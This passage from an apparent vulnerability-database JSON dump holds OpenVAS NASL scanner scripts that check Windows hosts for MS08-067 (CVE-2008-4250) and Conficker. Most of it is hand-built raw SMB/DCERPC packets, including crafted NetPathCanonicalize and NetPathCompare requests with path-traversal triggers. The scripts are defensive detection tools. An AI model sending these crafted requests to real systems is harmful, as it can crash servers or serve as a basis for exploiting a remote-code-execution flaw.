\"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\");\n script_id(900091);\n script_version(\"$Revision: 7551 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 14:24:05 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-17 13:24:25 +0200 (Fri, 17 Apr 2009)\");\n script_bugtraq_id(31874);\n script_cve_id(\"CVE-2008-4250\");\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_ATTACK);\n script_family(\"Malware\");\n script_name(\"Conficker Detection\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_dependencies(\"secpod_reg_enum.nasl\", \"nmap_nse/gb_nmap_p2p_conficker.nasl\",\n \"nmap_nse/gb_nmap_smb_check_vulns.nasl\", \"os_detection.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"insight\" , value : tag_insight);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\n# First of all check whether nmap already detected an infection.\nres = get_kb_list(\"conficker/nse\");\nif (!isnull(res)) {\n report = 'Nmap (http://nmap.org) has detected a possible infection:\\n';\n\n foreach msg (res) {\n report += msg + '\\n';\n }\n security_message(data:report);\n exit(0);\n}\n\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp(port);\nif(!soc){\n exit(0);\n}\n\nr = smb_session_request(soc:soc, remote:name);\nif(!r) { close(soc); exit(0); }\n\nif(!domain){\n domain = \"\";\n}\n\nif(!login && !pass)\n{\n login = \"\";\n pass = \"\";\n prot = smb_neg_prot_anonymous(soc:soc);\n}\n\nelse {\n prot = smb_neg_prot(soc:soc);\n}\n\nif(!prot)\n{\n close(soc);\n exit(0);\n}\n\n##Validate length of response\nif(strlen(prot) < 5 ) {\n exit(0);\n}\n\n##Currently Only SMB1 is supported, For SMB2 ord(prot[4]) == 254\nif(ord(prot[4]) == 254)\n{\n ##Close current Socket\n close(soc);\n ## Open a new Socket\n soc = open_sock_tcp(port);\n if(!soc){\n exit(0);\n }\n\n ##Session Request\n r = smb_session_request(soc:soc, remote:name);\n if(!r) { close(soc); exit(0); }\n\n ##Try negotiating with SMB1\n prot = smb_neg_prot_NTLMv1(soc:soc);\n if(!prot)\n {\n close(soc);\n exit(0);\n }\n}\n\nr = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);\nif(!r)\n{\n close(soc);\n report = string(\"MS08-067: Failed to perform Clear Text based authentication.\");\n exit(0);\n}\n\nuid = session_extract_uid(reply:r);\nif(!uid)\n{\n close(soc);\n exit(0);\n}\n\nr = smb_tconx(soc:soc, uid:uid, share:\"IPC$\", name:name);\nif(!r)\n{\n close(soc);\n exit(0);\n}\n\ntid = tconx_extract_tid(reply:r);\nif(!tid)\n{\n close(soc);\n exit(0);\n}\n\ntid_high = tid / 256;\ntid_low = tid % 256;\nuid_high = uid / 256;\nuid_low = uid % 256;\n\n# \\srvsvc Request\nreq = raw_string(0xff, 0x53, 0x4d, 0x42, 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xea, 0x16,\n uid_low, uid_high, 0x00, 0x00, 0x18, 0xff, 0x00, 0x00, 0x00,\n 0x00, 0x08, 0x00, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x9f, 0x01, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02,\n 0x00, 0x00, 0x00, 0x03, 0x09, 0x00, 0x5c, 0x62, 0x72, 0x6f,\n 0x77, 0x73, 0x65, 0x72, 0x00);\n\nreq = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;\nsend(socket:soc, data:req);\nresp = smb_recv(socket:soc);\nif(strlen(resp) < 139)\n{\n close(soc);\n exit(0);\n}\n\nfid_low = ord(resp[42]);\nfid_high = ord(resp[43]);\n\n# srvsvc Bind Request\nreq = raw_string(0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xea, 0x16,\n uid_low, uid_high, 0x00, 0x00, 0x10, 0x00, 0x00, 0x48, 0x00,\n 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x48, 0x00,\n 0x4a, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x4f, 0x00,\n 0x5c, 0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 0x0b,\n 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8, 0x10, 0x00, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8,\n 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 0x5a,\n 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 0x00, 0x00, 0x04,\n 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08,\n 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00);\n\nreq = raw_string(0x00, 0x00, 0x00, (strlen(req)%256)) + req;\nsend(socket:soc, data:req);\nsmb_recv(socket:soc);\n\n# ntrPathCanonicalize Request (With Malicious Code)\nreq = raw_string(\n0xff, 0x53, 0x4d, 0x42, 0x25, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\ntid_low, tid_high,\n0xea, 0x16,\nuid_low, uid_high,\n0x00, 0x00, 0x10, 0x00, 0x00, 0x60, 0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x4a, 0x00, 0x60,\n0x00, 0x4a, 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high, 0x67, 0x00, 0x5c, 0x50,\n0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,\n0x60, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x1f, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x2e, 0x00,\n0x2e, 0x00, 0x5c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x5c, 0x00,\n0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00);\n\nreq = raw_string(0x00, 0x00, 0x00, 0xaa) + req;\n\nsend(socket:soc, data:req);\nresp = smb_recv(socket:soc);\nclose(soc);\n\nif(strlen(resp) < 100){\n exit(0);\n}\n\nif(ord(resp[96]) == 87 && ord(resp[97]) == 00 && ord(resp[98]) == 00 && ord(resp[99]) == 00)\n{\n security_message(0);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:28", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.", "modified": "2019-05-03T00:00:00", "published": "2008-10-30T00:00:00", "id": "OPENVAS:1361412562310900056", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900056", "title": "Vulnerability in Server Service Could Allow Remote Code Execution (958644)", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# Description: Vulnerability in Server Service Could Allow Remote Code Execution (958644)\n#\n# Authors:\n# Chandan S <schandan@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2008 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n##############################################################################\n\n#############################################################################\n# Based on the work of Tim Brown <timb@nth-dimension.org.uk> as published\n# here, http://www.nth-dimension.org.uk/blog.php?id=72\n############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900056\");\n script_version(\"2019-05-03T10:54:50+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 10:54:50 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2008-10-30 14:46:44 +0100 (Thu, 30 Oct 2008)\");\n script_bugtraq_id(31874);\n script_cve_id(\"CVE-2008-4250\");\n script_copyright(\"Copyright (C) 2008 SecPod\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_DENIAL);\n script_family(\"Windows : Microsoft Bulletins\");\n script_name(\"Vulnerability in Server Service Could Allow Remote Code Execution (958644)\");\n script_dependencies(\"os_detection.nasl\", \"smb_nativelanman.nasl\", \"netbios_name_get.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"Host/runs_windows\");\n script_exclude_keys(\"SMB/samba\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/32326\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/827267\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/46040\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id?1021091\");\n script_xref(name:\"URL\", value:\"http://blogs.securiteam.com/index.php/archives/1150\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx\");\n script_xref(name:\"URL\", value:\"http://technet.microsoft.com/en-us/security/dd452420.aspx\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 2K Service Pack 4 and prior.\n\n Microsoft Windows XP Service Pack 3 and prior.\n\n Microsoft Windows 2003 Service Pack 2 and prior.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to an error in the Server Service, that does not properly\n handle specially crafted RPC requests.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS08-067.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to take\n complete control of an affected system.\n\n Variants of Conficker worm are based on the above described vulnerability.\n More details regarding the worm and means to resolve this can be found at,\n the linked references.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"host_details.inc\");\n\nif( kb_smb_is_samba() ) exit( 0 );\n\nname = kb_smb_name();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\nport = kb_smb_transport();\n\nsoc = open_sock_tcp(port);\nif(!soc){\n exit(0);\n}\n\nif(!login)login = \"\";\nif(!pass) pass = \"\";\n\nr = smb_session_request(soc:soc, remote:name);\nif(!r) { close(soc); exit(0); }\n\nprot = smb_neg_prot(soc:soc);\nif(!prot){ close(soc); exit(0); }\n\nr = smb_session_setup(soc:soc, login:login, password:pass, domain:domain, prot:prot);\nif(!r)\n{\n close(soc);\n exit(0);\n}\n\nuid = session_extract_uid(reply:r);\nif(!uid)\n{\n close(soc);\n exit(0);\n}\n\nr = smb_tconx(soc:soc, uid:uid, share:\"IPC$\", name:name);\nif(!r)\n{\n close(soc);\n exit(0);\n}\n\ntid = tconx_extract_tid(reply:r);\nif(!tid)\n{\n close(soc);\n exit(0);\n}\n\ntid_high = tid / 256;\ntid_low = tid % 256;\nuid_high = uid / 256;\nuid_low = uid % 256;\n\n## SMB NT Create AndX Request, Path: \\browser\nsmb_nt_andx_req = raw_string(0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,\n 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x00, 0x01, 0x18, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x16, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01,\n 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00,\n 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00,\n 0x40, 0x00, 0x02, 0x00, 0x00, 0x00, 0x03, 0x13,\n 0x00, 0x00, 0x5c, 0x00, 0x62, 0x00, 0x72, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_nt_andx_req);\n\nsmb_nt_andx_resp = smb_recv(socket:soc);\nif(smb_nt_andx_resp && strlen(smb_nt_andx_resp) < 107)\n{\n close(soc);\n exit(0);\n}\n\nfid_low = ord(smb_nt_andx_resp[42]);\nfid_high = ord(smb_nt_andx_resp[43]);\n\n## DCERPC Bind: call_id: 0 SRVSVC V3.0\ndcerpc_bind_srvsvc_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d,\n 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18,\n 0x03, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n tid_low, tid_high, 0xd9, 0x46, uid_low,\n uid_high, 0x40, 0x01, 0x0e, 0xff, 0x00,\n 0x00, 0x00, fid_low, fid_high, 0x00, 0x00,\n 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x08,\n 0x00, 0x48, 0x00, 0x00, 0x00, 0x48, 0x00,\n 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49,\n 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03, 0x10,\n 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0xb8, 0x10, 0xb8,\n 0x10, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8,\n 0x4f, 0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01,\n 0x12, 0x78, 0x5a, 0x47, 0xbf, 0x6e, 0xe1,\n 0x88, 0x03, 0x00, 0x00, 0x00, 0x04, 0x5d,\n 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f,\n 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,\n 0x02, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:dcerpc_bind_srvsvc_req);\n\ndcerpc_bind_srvsvc_resp = smb_recv(socket:soc);\nif(!dcerpc_bind_srvsvc_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Read AndX Request\nsmb_andx_req = raw_string(0x00, 0x00, 0x00, 0x3c, 0xff, 0x53, 0x4d, 0x42,\n 0x2e, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x80, 0x01, 0x0c, 0xff,\n 0x00, 0x00, 0x00, fid_low, fid_high, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x04, 0x00, 0x04, 0xff, 0xff,\n 0xff, 0xff, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_andx_req);\n\nsmb_andx_resp = smb_recv(socket:soc);\nif(!smb_andx_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB NT Create AndX Request, Path: \\browser\nsmb_nt_andx_req1 = raw_string(0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42,\n 0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x00, 0x01, 0x18, 0xff,\n 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x16, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00,\n 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x40, 0x00,\n 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x03, 0x13,\n 0x00, 0x00, 0x5c, 0x00, 0x62, 0x00, 0x72, 0x00,\n 0x6f, 0x00, 0x77, 0x00, 0x73, 0x00, 0x65, 0x00,\n 0x72, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_nt_andx_req1);\n\nsmb_nt_andx_resp1 = smb_recv(socket:soc);\nif(smb_nt_andx_resp1 && strlen(smb_nt_andx_resp1) < 107)\n{\n close(soc);\n exit(0);\n}\n\nfid2_low = ord(smb_nt_andx_resp1[42]);\nfid2_high = ord(smb_nt_andx_resp1[43]);\n\n## DCERPC Bind: call_id: 1 WKSSVC V1.0\ndcerpc_bind_wkssvc_req = raw_string(0x00, 0x00, 0x00, 0x88, 0xff, 0x53, 0x4d,\n 0x42, 0x2f, 0x00, 0x00, 0x00, 0x00, 0x18,\n 0x03, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n tid_low, tid_high, 0xd9, 0x46, uid_low,\n uid_high, 0x00, 0x02, 0x0e, 0xff, 0x00,\n 0x00, 0x00, fid2_low, fid2_high, 0x00,\n 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff,\n 0x08, 0x00, 0x48, 0x00, 0x00, 0x00, 0x48,\n 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x49, 0x00, 0x00, 0x05, 0x00, 0x0b, 0x03,\n 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x10,\n 0xb8, 0x10, 0x00, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,\n 0x98, 0xd0, 0xff, 0x6b, 0x12, 0xa1, 0x10,\n 0x36, 0x98, 0x33, 0x46, 0xc3, 0xf8, 0x7e,\n 0x34, 0x5a, 0x01, 0x00, 0x00, 0x00, 0x04,\n 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,\n 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48,\n 0x60, 0x02, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:dcerpc_bind_wkssvc_req);\n\ndcerpc_bind_wkssvc_resp = smb_recv(socket:soc);\nif(!dcerpc_bind_wkssvc_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Read AndX Request\nsmb_andx_req1 = raw_string(0x00, 0x00, 0x00, 0x3c, 0xff, 0x53, 0x4d, 0x42,\n 0x2e, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x40, 0x02, 0x0c, 0xff,\n 0x00, 0x00, 0x00, fid2_low, fid2_high, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x04, 0x00, 0x04, 0xff, 0xff,\n 0xff, 0xff, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_andx_req1);\n\nsmb_andx_resp1 = smb_recv(socket:soc);\nif(!smb_andx_resp1)\n{\n close(soc);\n exit(0);\n}\n\n## SRVSVC NetPathCompare request\nnetpath_cmp_req= raw_string(0x00, 0x00, 0x01, 0x10, 0xff, 0x53, 0x4d, 0x42,\n 0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0xc0, 0x02, 0x10, 0x00,\n 0x00, 0xbc, 0x00, 0x00, 0x00, 0xff, 0xff, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x54, 0x00, 0xbc, 0x00, 0x54,\n 0x00, 0x02, 0x00, 0x26, 0x00, fid_low, fid_high,\n 0xcd, 0x00, 0x00, 0x5c, 0x00, 0x50, 0x00, 0x49,\n 0x00, 0x50, 0x00, 0x45, 0x00, 0x5c, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x03, 0x10,\n 0x00, 0x00, 0x00, 0xbc, 0x00, 0x00, 0x00, 0x03,\n 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x20, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2f,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2f,\n 0x00, 0x00, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x41, 0x00, 0x41, 0x00, 0x41,\n 0x00, 0x41, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x2e,\n 0x00, 0x5c, 0x00, 0x4f, 0x00, 0x70, 0x00, 0x65,\n 0x00, 0x6e, 0x00, 0x56, 0x41, 0x53, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x5c,\n 0x00, 0x4f, 0x00, 0x70, 0x00, 0x65, 0x00, 0x6e,\n 0x00, 0x56, 0x41, 0x53, 0x00, 0x00, 0x00, 0x01,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:netpath_cmp_req);\n\nnetpath_cmp_resp = smb_recv(socket:soc);\nif(!netpath_cmp_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Tree Disconnect Request\nsmb_tree_dis_req = raw_string(0x00, 0x00, 0x00, 0x23, 0xff, 0x53, 0x4d, 0x42,\n 0x71, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, tid_low, tid_high, 0xd9,\n 0x46, uid_low, uid_high, 0x00, 0x03, 0x00, 0x00,\n 0x00);\n\nsend(socket:soc, data:smb_tree_dis_req);\n\nsmb_tree_dis_resp = smb_recv(socket:soc);\nif(!smb_tree_dis_resp)\n{\n close(soc);\n exit(0);\n}\n\n## SMB Logoff AndX Request\nsmb_logoff_req = raw_string(0x00, 0x00, 0x00, 0x27, 0xff, 0x53, 0x4d, 0x42,\n 0x74, 0x00, 0x00, 0x00, 0x00, 0x18, 0x03, 0xc8,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd9, 0x46,\n uid_low, uid_high, 0x40, 0x03, 0x02, 0xff, 0x00,\n 0x00, 0x00, 0x00, 0x00);\n\nsend(socket:soc, data:smb_logoff_req);\n\nsmb_logoff_resp = smb_recv(socket:soc);\nif(!smb_logoff_resp)\n{\n close(soc);\n exit(0);\n}\n\n## nb: Checking netpath_cmp_resp, to confirm the vuln. After applying the patch, netpath_cmp_resp contains Windows Error: WERR_INVALID_NAME (0x0000007b)\nif(ord(netpath_cmp_resp[84]) == 00 && ord(netpath_cmp_resp[85]) == 00 &&\n ord(netpath_cmp_resp[86]) == 00 && ord(netpath_cmp_resp[87]) == 00){\n security_message(port);\n}\n\nclose(soc);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:02", "bulletinFamily": "scanner", "description": "Checks for vulnerabilities:\n\n - MS08-067, a Windows RPC vulnerability\n\n - Conficker, an infection by the Conficker worm\n\n - Unnamed regsvc DoS, a denial-of-service vulnerability I accidentally found in Windows 2000\n\n - SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)\n\n - MS06-025, a Windows Ras RPC service vulnerability\n\n - MS07-029, a Windows Dns Server RPC service vulnerability\n\nWARNING: These checks are dangerous, and are very likely to bring down a server. These should not\nbe run in a production environment unless you (and, more importantly, the business) understand the\nrisks!\n\nAs a system administrator, performing these kinds of checks is crucial, because a lot more damage\ncan be done by a worm or a hacker using this vulnerability than by a scanner. Penetration testers,\non the other hand, might not want to use this script -- crashing services is not generally a good\nway of sneaking through a network.\n\nIf you set the script parameter ", "modified": "2019-04-29T00:00:00", "published": "2013-02-28T00:00:00", "id": "OPENVAS:1361412562310803571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803571", "title": "Nmap NSE 6.01: smb-check-vulns", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Autogenerated NSE wrapper\n#\n# Authors:\n# NSE-Script: Ron Bowes\n# NASL-Wrapper: autogenerated\n#\n# Copyright:\n# NSE-Script: The Nmap Security Scanner (http://nmap.org)\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803571\");\n script_version(\"2019-04-29T07:32:42+0000\");\n script_cve_id(\"CVE-2006-2370\", \"CVE-2006-2371\", \"CVE-2007-1748\", \"CVE-2008-4250\", \"CVE-2009-3103\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 